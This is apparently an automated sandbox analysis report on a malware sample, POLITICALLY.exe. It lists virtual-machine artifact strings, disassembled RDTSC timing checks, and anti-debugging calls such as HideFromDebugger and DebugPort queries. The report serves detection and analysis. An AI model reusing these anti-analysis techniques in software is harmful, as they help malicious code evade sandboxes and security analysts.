        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000002228D31 second address: 0000000002228D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB4B9D341h 0x0000001d popad 0x0000001e call 00007FDAB4B9B24Bh 0x00000023 lfence 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000000578D31 second address: 0000000000578D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB47B5431h 0x0000001d popad 0x0000001e call 00007FDAB47B333Bh 0x00000023 lfence 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02213269 rdtsc
        Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
        Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
        Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
        Source: POLITICALLY.exe, 0000000A.00000003.497685279.00000000008D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
        Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess information queried: ProcessInformation

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02213269 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02221066 LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02219212 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222C0B8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02219102 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222C1F4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222767D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_022197E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_022197DF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222440F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222C444 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02217A2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02219917 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222BFB8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221CD2F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EFE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E268E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B46A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CFE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2616E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2476E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E278EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2636CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E248794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2737F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F14FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FE539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2BA537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E273D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B3540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2E3D40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E257D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2635A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2E8DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E248A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E253A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]
